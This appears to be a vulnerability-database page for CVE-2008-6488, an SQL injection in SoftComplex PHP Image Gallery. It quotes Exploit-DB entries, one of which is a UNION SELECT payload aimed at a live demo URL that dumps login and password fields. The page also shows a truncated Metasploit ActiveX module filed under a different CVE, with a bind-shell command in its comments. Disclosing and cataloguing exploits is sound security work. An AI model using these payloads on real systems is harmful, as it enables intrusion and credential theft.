CVE-2008-6488
Published: 2009-03-18
Priority P3 · 40 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.6th percentile)
SQL injection vulnerability in index.php in SoftComplex PHP Image Gallery 1.0 allows remote attackers to execute arbitrary SQL commands via the Admin field in a login action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softcomplex | php_image_gallery | — | — |
No detection rules found.
Exploit-DB
SoftComplex PHP Image Gallery - 'ctg' SQL Injection
exploitdb·2008-11-06
CVE-2008-6488 SoftComplex PHP Image Gallery - 'ctg' SQL Injection
---
SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
MaiL : [email protected]
script : http://www.softcomplex.com/products/php_image_gallery/demo2/
ExploiT & demo
http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
Exploit-DB
SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
exploitdb·2008-11-06
CVE-2008-6488 SoftComplex PHP Image Gallery 1.0 - Authentication Bypass
---
= Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability =
Discovered By : Cyber-Zone
E-mail : [email protected]
Home : WwW.IQ-Ty.CoM
Download : http://www.softcomplex.com/products/php_image_gallery/
Exploit-DB
ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
exploitdb·2008-09-25·CVSS 7.5
CVE-2006-6488 [HIGH] ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)
---
##
# $Id: iconics_dlgwrapper.rb 1 2008-09-21 22:43:00Z kf $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
#
# $ msfcli exploit/windows/browser/iconics_dlgwrapper RHOST=10.211.55.6 PAYLOAD=windows/shell_bind_tcp E
require 'msf/core'
module Msf
class Exploits::Windows::Browser::Iconics_Dlgwrapper 'ICONICS Vessel / Gauge / Switch 8.02.140 ActiveX DoModal Overflow',
'Description' => %q{
This module exploits a stack overflow in the Iconics Vessel / Gauge / Switch ActiveX controls
},
'Lice
No writeups or analysis indexed.